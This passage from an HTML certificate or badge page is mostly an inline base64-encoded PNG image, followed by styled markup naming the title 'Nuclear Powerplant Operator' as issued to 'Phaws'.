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" class="sc-jTzLTM gdVHeQ" style="max-width: 110px;" /><h2 class="sc-bZQynM hJaChX" style="font-size: 18.4px; font-weight: normal; font-style: italic; line-height: 1.76; -webkit-letter-spacing: -0.1px; -moz-letter-spacing: -0.1px; -ms-letter-spacing: -0.1px; letter-spacing: -0.1px; color: #2c2b3f; margin: 25px 0 0 0;" > Nuclear Powerplant Operator</h2><p class="sc-gzVnrw gsQrMB" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; margin: 0;" > Issued to</p><h3 class="sc-htoDjs kQAJr" style="font-weight: normal; line-height: 1.38; -webkit-letter-spacing: -0.1px; -moz-letter-spacing: -0.1px; -ms-letter-spacing: -0.1px; letter-spacing: -0.1px; color: #d52c1e; margin: 0 0 10px 0; font-size: 46.4px; font-family: LucidaGrande; line-height: 0.7; -webkit-letter-spacing: -00.2px; -moz-letter-spacing: -00.2px; -ms-letter-spacing: -00.2px; letter-spacing: -00.2px; margin: 35px 0 40px 0; text-transform: uppercase;" > Phaws</h3><div class="sc-dnqmqq bDsesi"><div class="sc-gpHHfC hrlnEG" style="display: inline-block; margin-right: 35px; 
